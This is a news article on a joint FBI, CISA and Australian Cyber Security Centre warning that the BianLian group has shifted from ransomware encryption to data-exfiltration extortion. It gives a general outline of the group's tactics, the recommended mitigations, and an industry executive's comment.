The U.S. Federal Bureau of Investigation, the Cybersecurity and Infrastructure Security Agency and the Australian Cyber Security Centre have issued a joint warning about a change in tactics from a well-known ransomware group from traditional ransomware encryption to exfiltration-based extortion.

The group, called BianLian, is believed to have first emerged in 2021. It came to widespread attention last year when it targeted companies in the U.S., the U.K. and Australia with traditional ransomware attacks, including encrypting files and demanding a ransom be paid. It creates its own ransomware and had previously used “double-extortion” attacks, meaning that along with encrypting files, it also stole data and threatened to release the stolen data should a payment not be provided.

Forward to today and the group is said to have dropped the file encryption typical of ransomware attacks to switch to data exfiltration-based extortion alone.

The group gains access to victim systems through valid Remote Desktop Protocol credentials, uses open-source tools and command-line scripting for discovery and credential harvesting, and then exfiltrates victim data via File Transfer Protocol, Rclone, or Mega. Previous BianLian targets included multiple critical infrastructure providers in the U.S. and Australia, as well as victims in the professional services and property development space.

The joint warning Tuesday from the FBI, CISA and the ACSC encourages critical infrastructure organizations and small and medium-sized organizations to implement security practices to reduce the likelihood and impact of BianLian and other ransomware incidents.

Recommended mitigations include auditing remote access tools, reviewing logs for the execution of remote access software, using security software to detect instances of remote access, limiting authorized remote access solutions, and blocking both inbound and outbound connections on remote access software ports and protocols.

“Confirmation that the BianLian group has moved away from delivering ransomware payloads in favor of purely data exfiltration and extortion attacks shows how successful the double extortion strategy is for ransomware groups,” Jon Miller, chief executive officer of anti-ransomware platform provider Halcyon Tech Inc., told SiliconANGLE. “It works so well that we will likely see more groups follow suit and forego the hassle of developing and managing the encryption and decryption process in favor of a less complicated attack. With data exfiltration as one of the primary tactics employed in today’s multi-stage ransomware attacks, we should really start thinking of these as data extortion attacks with some ransomware thrown into the mix sometimes, as opposed to ransomware attacks that sometimes include data exfil.”

Image: TheDigitalArtist/Pixabay